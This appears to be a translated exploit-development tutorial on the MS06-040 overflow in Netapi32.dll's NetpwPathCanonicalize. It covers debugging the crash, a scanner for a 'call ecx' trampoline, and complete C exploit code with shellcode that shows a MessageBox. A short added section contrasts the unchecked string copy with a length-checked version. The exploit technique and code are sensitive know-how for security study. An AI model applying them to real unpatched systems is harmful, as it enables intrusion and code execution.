Buffer Overflow Analysis Lesson No. 08: ms06-040 Vulnerability Research--Dynamic debugging

Source: Internet
Author: User

Preface

In the last lesson we analysed the nature of the ms06-040 vulnerability; this time we write a program that actually exploits it.

Framework of the exploit program

Here I use VC++ 6.0, and the Netapi32.dll that contains the vulnerability must be placed in the same directory as the project file. The program is as follows:

    #include <windows.h>

    typedef void (*MYPROC)(LPTSTR, ...);

    int main()
    {
        char Str[0x320];
        char lpWideCharStr[0x440];
        int  arg_8 = 0x440;
        char Source[0x100];
        long arg_10 = 44;
        HINSTANCE LibHandle;
        MYPROC Func;
        char DllName[] = "./netapi32.dll";

        /* Load the vulnerable copy of Netapi32.dll from the project directory */
        LibHandle = LoadLibrary(DllName);
        if (LibHandle == NULL) {
            MessageBox(0, "Can't load dll!", "Warning", 0);
            return 1;
        }

        /* Resolve the address of the vulnerable export */
        Func = (MYPROC)GetProcAddress(LibHandle, "NetpwPathCanonicalize");
        if (Func == NULL) {
            MessageBox(0, "Can't load function address!", "Warning", 0);
            FreeLibrary(LibHandle);
            return 1;
        }

        /* Fill the two string arguments: Str with 'a', Source with 'B' */
        memset(Str, 0, sizeof(Str));
        memset(Str, 'a', sizeof(Str) - 2);
        memset(Source, 0, sizeof(Source));
        memset(Source, 'B', sizeof(Source) - 2);

        (Func)(Str, lpWideCharStr, arg_8, Source, &arg_10, 0);

        FreeLibrary(LibHandle);
        return 0;
    }
The program uses LoadLibrary() to obtain the base address of the Netapi32.dll placed in the project directory, then GetProcAddress() to obtain the address of NetpwPathCanonicalize() inside that DLL. It fills the Str and Source arguments that reach the vulnerable function with memset() and then calls it. When the program is compiled and run, the system reports an error:


Figure 1

The error message shows that the program has suffered a buffer overflow: the return address has been overwritten with 0x61616161, that is, four 'a' characters.

Dynamic debugging of the vulnerability

We load the program above in OllyDbg (OD) and load Netapi32.dll in IDA. Then we execute the LoadLibrary() call in OD:


Figure 2

It can be seen that Netapi32.dll has been loaded successfully and that the load address of the DLL is returned in EAX. Next, the address of NetpwPathCanonicalize() is looked up in IDA:


Figure 3

The address of the function is 0x7517f2e2, so we jump directly to this location in OD, set a breakpoint there and run to it:


Figure 4

From the last lesson we know that the problematic function is the one invoked by call sub_7517fc68 at address 0x7517f856:


Figure 5

The next step is to step into this call in OD for analysis. First, look at the current state of the stack:


Figure 6

From this we see that the return address is stored at 0x0012f670; this is the location that must be overwritten with the "springboard" address. Now let the program execute the first string copy:


Figure 7

As can be seen, the copy starts at 0x0012f258 and copies a total of 254 (0xFE) 'B' characters, consistent with the program we wrote. The program then appends a "\" to the string, after which the second string copy takes place:


Figure 8

Here the long string of 'a' is joined on after the "\": the 'a' characters begin at address 0x0012f358 and a total of 798 (0x31e) bytes are copied, again consistent with the program we wrote. Execution then reaches the return instruction, and because the return address now points to unmapped memory, an error is raised:


Figure 9

At this point we notice that ECX holds the address of the beginning of the buffer. We can take advantage of this: place the shellcode in the Source string and overwrite the return address with the address of a call ecx instruction, so that when the function returns, execution lands directly at 0x0012f258.
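The copy pattern traced above (Source is copied, "\" is appended, then Str is appended, with no check against the buffer size) is what lets the return address be reached. The following added illustration is not code from the article or from Netapi32.dll; it is a simplified model of that pattern next to a hardened version that checks the combined length first, and it re-uses the article's sizes (0xFE 'B's, 0x31E 'a's, 0x418 bytes from buffer start to return address) to show why the unchecked copy clobbers the return address.

```c
/* Added illustration (constructed model, not the real NetpwPathCanonicalize). */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: concatenate into a fixed stack buffer without ever
 * comparing the combined length against the buffer size. */
static void canon_unchecked(char *out, const char *src, const char *str)
{
    strcpy(out, src);      /* first copy: Source ("B"s in the article) */
    strcat(out, "\\");     /* separator */
    strcat(out, str);      /* second copy: Str ("a"s) is what overruns */
}

/* Bytes the concatenation needs, including the terminating NUL. */
static size_t canon_required(const char *src, const char *str)
{
    return strlen(src) + 1 + strlen(str) + 1;
}

/* Hardened pattern: check before copying. Returns 0 on success, -1 if the
 * result would not fit; out is left untouched on failure. */
static int canon_checked(char *out, size_t out_size,
                         const char *src, const char *str)
{
    if (canon_required(src, str) > out_size)
        return -1;
    strcpy(out, src);
    strcat(out, "\\");
    strcat(out, str);
    return 0;
}

/* Rebuild the article's inputs (0xFE 'B's, 0x31E 'a's) and use 0x418,
 * the distance from buffer start to the saved return address in the
 * trace, as the space that may be written. Returns 1 if the hardened
 * copy correctly refuses the input. */
static int demo_article_sizes(void)
{
    static char src[0x100], str[0x320], out[0x418];
    memset(src, 'B', 0xFE); src[0xFE] = '\0';
    memset(str, 'a', 0x31E); str[0x31E] = '\0';
    return canon_checked(out, sizeof out, src, str) == -1;
}

int main(void)
{
    char out[64];
    canon_unchecked(out, "srv", "share");            /* fits, so harmless here */
    printf("%s needs %zu bytes\n", out, canon_required("srv", "share"));
    printf("article-sized input rejected: %d\n", demo_article_sizes());
    return 0;
}
```

The article's input needs 0xFE + 1 + 0x31E + 1 = 0x41E bytes, more than the 0x418 available before the return address, which is exactly why the saved return address ends up as 0x61616161.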

Getting the address of call ecx

We also need to locate a call ecx instruction. Its opcode is FF D1. We search for it directly in the Netapi32.dll used by this program, with a few changes to the program used earlier to find call esp:

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>

    #define DLL_NAME "./netapi32.dll"

    int main()
    {
        BYTE *ptr;
        int position, address;
        HINSTANCE handle;
        BOOL done_flag = FALSE;

        handle = LoadLibrary(DLL_NAME);
        if (!handle) {
            printf("Load DLL error!");
            exit(0);
        }
        ptr = (BYTE *)handle;

        /* Walk the mapped image looking for FF D1 (call ecx). The scan ends
           when reading past the end of the mapping raises an access
           violation, which VC++ 6.0's catch(...) traps. */
        for (position = 0; !done_flag; position++) {
            try {
                if (ptr[position] == 0xff && ptr[position + 1] == 0xd1) {
                    address = (int)ptr + position;
                    printf("OPCODE found at 0x%x\n", address);
                }
            } catch (...) {
                address = (int)ptr + position;
                printf("END of 0x%x\n", address);
                done_flag = TRUE;
            }
        }
        getchar();
        return 0;
    }
The results are as follows:


Figure 10

From these results I choose the first one, 0x751852f9, as the springboard for our shellcode. Note that the return address is at 0x0012f670 and the beginning of the buffer is at 0x0012f258, an offset of 0x418 between them. Subtracting the 0x100 occupied by the Source parameter and the "\" gives 0x418 - 0x100 = 0x318, so the return address is overwritten starting at offset 0x318 of the Str string.

Completing the exploit program

The framework program above can then be modified as follows:

    #include <windows.h>

    typedef void (*MYPROC)(LPTSTR, ...);

    char shellcode[] =
        "\x33\xdb"                  /* xor  ebx, ebx                         */
        "\xb7\x06"                  /* mov  bh, 6                            */
        "\x2b\xe3"                  /* sub  esp, ebx                         */
        "\x33\xdb"                  /* xor  ebx, ebx                         */
        "\x53"                      /* push ebx                              */
        "\x68\x69\x6e\x67\x20"      /* push "ing "                           */
        "\x68\x57\x61\x72\x6e"      /* push "Warn"                           */
        "\x8b\xc4"                  /* mov  eax, esp                         */
        "\x53"                      /* push ebx                              */
        "\x68\x2e\x29\x20\x20"
        "\x68\x20\x4a\x2e\x59"
        "\x68\x21\x28\x62\x79"
        "\x68\x63\x6b\x65\x64"
        "\x68\x6e\x20\x68\x61"
        "\x68\x20\x62\x65\x65"
        "\x68\x68\x61\x76\x65"
        "\x68\x59\x6f\x75\x20"      /* push "You have been hacked! (by J.Y.)" */
        "\x8b\xcc"                  /* mov  ecx, esp                         */
        "\x53"                      /* push ebx                              */
        "\x50"                      /* push eax                              */
        "\x51"                      /* push ecx                              */
        "\x53"                      /* push ebx                              */
        "\xb8\xea\x07\xd5\x77"      /* mov  eax, 77d507ea (MessageBox)       */
        "\xff\xd0"                  /* call eax                              */
        "\x53"                      /* push ebx                              */
        "\xb8\xfa\xca\x81\x7c"      /* mov  eax, 7c81cafa (ExitProcess)      */
        "\xff\xd0";                 /* call eax                              */

    int main()
    {
        char Str[0x320];
        char lpWideCharStr[0x440];
        int  arg_8 = 0x440;
        char Source[0x100];
        long arg_10 = 44;
        HINSTANCE LibHandle;
        MYPROC Func;
        char DllName[] = "./netapi32.dll";

        /* Make sure user32.dll is mapped, since the shellcode calls MessageBox */
        LoadLibrary("user32.dll");

        LibHandle = LoadLibrary(DllName);
        if (LibHandle == NULL) {
            MessageBox(0, "Can't load dll!", "Warning", 0);
            return 1;
        }
        Func = (MYPROC)GetProcAddress(LibHandle, "NetpwPathCanonicalize");
        if (Func == NULL) {
            MessageBox(0, "Can't load function address!", "Warning", 0);
            FreeLibrary(LibHandle);
            return 1;
        }

        memset(Str, 0, sizeof(Str));
        memset(Str, 'a', sizeof(Str) - 2);
        memset(Source, 0, sizeof(Source));
        memset(Source, 'B', sizeof(Source) - 2);

        /* Shellcode goes at the start of Source, which ECX points to on return */
        memcpy(Source, shellcode, sizeof(shellcode));

        /* Overwrite the return address at offset 0x318 with 0x751852f9 (call ecx) */
        Str[0x318] = 0xf9;
        Str[0x319] = 0x52;
        Str[0x31a] = 0x18;
        Str[0x31b] = 0x75;

        (Func)(Str, lpWideCharStr, arg_8, Source, &arg_10, 0);

        FreeLibrary(LibHandle);
        return 0;
    }
The result of running it is as follows:


Figure 11

It can be seen that we have successfully exploited this vulnerability.

Summary

This shows that for system-level vulnerabilities it is very important to apply patches promptly. And as a vulnerability analyst, one also needs perseverance: keep accumulating experience and have the courage to take on challenges, because only by trying a great deal does one reap the rewards.
